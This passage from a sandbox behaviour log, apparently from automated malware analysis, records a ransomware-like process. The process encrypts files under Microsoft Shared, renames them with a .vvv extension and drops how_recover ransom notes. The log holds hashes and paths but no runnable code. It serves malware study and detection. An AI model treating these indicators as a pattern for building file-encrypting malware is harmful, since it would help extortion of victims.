- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521264
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79209
- mode: created
- sequenceNumber: 1371
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521265
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79213
- mode: close
- sequenceNumber: 1372
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521265
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79218
- mode: created
- sequenceNumber: 1373
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521266
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79222
- mode: close
- sequenceNumber: 1374
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521266
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79229
- mode: created
- sequenceNumber: 1375
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521267
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79234
- mode: close
- sequenceNumber: 1376
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521267
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79241
- mode: open
- sequenceNumber: 1377
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT
- filesize: 1183416
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953501086
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79931
- mode: close
- sequenceNumber: 1378
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT
- filesize: 1183838
- md5sum: e28e2d3dcf1e618996bd87dcd75865aa
- sha1sum: ea89cd4c4ff96feea5010f22ef2a757b1c2dd142
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953501086
- ntstatus: 0x0
- CreateOptions: 0x0
- high_cpu:
- timestamp: 80092
- sequenceNumber: 1379
- total_cpu: 55.882070135746609
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 55.882070135746609
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 80180
- mode: rename
- sequenceNumber: 1380
- filesize: 1183838
- md5sum: e28e2d3dcf1e618996bd87dcd75865aa
- sha1sum: ea89cd4c4ff96feea5010f22ef2a757b1c2dd142
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT
- new_name: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT.vvv
- ads:
- fid (ads:): 562949953501086
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80188
- mode: created
- sequenceNumber: 1381
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521268
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80194
- mode: close
- sequenceNumber: 1382
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521268
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80199
- mode: created
- sequenceNumber: 1383
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521269
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80209
- mode: close
- sequenceNumber: 1384
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521269
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80215
- mode: created
- sequenceNumber: 1385
- value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521270
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80220
- mode: close
- sequenceNumber: 1386
- value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521270
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80276
- mode: created
- sequenceNumber: 1387
- value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521271
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80282
- mode: close
- sequenceNumber: 1388
- value: C:\Program Files\Common Files\Microsoft Shared\Source Engine\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521271
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80307
- mode: failed
- sequenceNumber: 1389
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80313
- mode: failed
- sequenceNumber: 1390
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80320
- mode: failed
- sequenceNumber: 1391
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80342
- mode: failed
- sequenceNumber: 1392
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80348
- mode: failed
- sequenceNumber: 1393
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80375
- mode: failed
- sequenceNumber: 1394
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80380
- mode: failed
- sequenceNumber: 1395
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Notebook.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80385
- mode: failed
- sequenceNumber: 1396
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\OrangeCircles.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80391
- mode: failed
- sequenceNumber: 1397
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80396
- mode: failed
- sequenceNumber: 1398
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Pine_Lumber.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80401
- mode: failed
- sequenceNumber: 1399
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80407
- mode: failed
- sequenceNumber: 1400
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80412
- mode: failed
- sequenceNumber: 1401
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80418
- mode: failed
- sequenceNumber: 1402
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80424
- mode: failed
- sequenceNumber: 1403
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80429
- mode: failed
- sequenceNumber: 1404
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80435
- mode: failed
- sequenceNumber: 1405
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80440
- mode: failed
- sequenceNumber: 1406
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80445
- mode: failed
- sequenceNumber: 1407
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80452
- mode: failed
- sequenceNumber: 1408
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 80457
- mode: created
- sequenceNumber: 1409
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521272
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80463
- mode: close
- sequenceNumber: 1410
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521272
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80478
- mode: created
- sequenceNumber: 1411
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521273
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80482
- mode: close
- sequenceNumber: 1412
- value: C:\Program Files\Common Files\Microsoft Shared\Stationery\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521273
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80487
- mode: created
- sequenceNumber: 1413
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521274
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80491
- mode: close
- sequenceNumber: 1414
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521274
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80496
- mode: created
- sequenceNumber: 1415
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521275
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80500
- mode: close
- sequenceNumber: 1416
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521275
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 80538
- repeat: 4000
- sequenceNumber: 1417
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 80567
- mode: created
- sequenceNumber: 1418
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521276
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80572
- mode: close
- sequenceNumber: 1419
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521276
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80578
- mode: created
- sequenceNumber: 1420
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521277
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80582
- mode: close
- sequenceNumber: 1421
- value: C:\Program Files\Common Files\Microsoft Shared\TextConv\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521277
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80833
- mode: open
- sequenceNumber: 1422
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG
- filesize: 25234
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499608
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80961
- mode: close
- sequenceNumber: 1423
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG
- filesize: 25662
- md5sum: 936e908b9602e8e44c810820c1c3a753
- sha1sum: 418e0f6859a731f4376388952b810d10d0e12f26
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499608
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80970
- mode: rename
- sequenceNumber: 1424
- filesize: 25662
- md5sum: 936e908b9602e8e44c810820c1c3a753
- sha1sum: 418e0f6859a731f4376388952b810d10d0e12f26
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499608
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 80993
- mode: created
- sequenceNumber: 1425
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521278
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 80999
- mode: close
- sequenceNumber: 1426
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521278
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81007
- mode: created
- sequenceNumber: 1427
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521279
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81015
- mode: close
- sequenceNumber: 1428
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\AFTRNOON\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521279
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81023
- mode: open
- sequenceNumber: 1429
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG
- filesize: 19780
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499609
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81302
- mode: close
- sequenceNumber: 1430
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG
- filesize: 20206
- md5sum: 5982bef985dee08932b20064a17c3832
- sha1sum: eafe87450fc926aa6aaf9320e05c3d44e892233c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499609
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81333
- mode: rename
- sequenceNumber: 1431
- filesize: 20206
- md5sum: 5982bef985dee08932b20064a17c3832
- sha1sum: eafe87450fc926aa6aaf9320e05c3d44e892233c
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499609
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81487
- mode: created
- sequenceNumber: 1432
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930222253
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 81492
- mode: close
- sequenceNumber: 1433
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930222253
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 81505
- mode: created
- sequenceNumber: 1434
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ARCTIC\how_recover+deg.html
- processinfo:
- pid: 1648
